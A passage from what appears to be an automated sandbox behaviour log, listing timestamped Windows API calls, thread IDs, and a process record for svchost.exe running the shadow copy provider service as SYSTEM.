dwHighDateTime=0x1d50bf6)) [0045.578] GetCurrentProcessId () returned 0xabc [0045.578] GetCurrentThreadId () returned 0xacc [0045.578] GetTickCount () returned 0x1a16c [0045.578] QueryPerformanceCounter (in: lpPerformanceCount=0xf4dac8 | out: lpPerformanceCount=0xf4dac8*=16602573770) returned 1 [0045.578] malloc (_Size=0x100) returned 0x2e8e80 Thread: id = 31 os_tid = 0xac8 Thread: id = 32 os_tid = 0xac4 Thread: id = 33 os_tid = 0xac0 Thread: id = 34 os_tid = 0xadc Thread: id = 41 os_tid = 0xb54 Thread: id = 42 os_tid = 0x4f0 Process: id = "6" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x43581000" os_pid = "0xae0" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0xabc" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:00079d62" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 35 os_tid = 0xaf4 Thread: id = 36 os_tid = 0xaf0 Thread: id = 37 os_tid = 0xaec Thread: id = 38 os_tid = 0xae8 Thread: id = 39 os_tid = 0xae4 Thread: id = 40 os_tid = 0xaf8 Thread: id = 43 os_tid = 0x6a8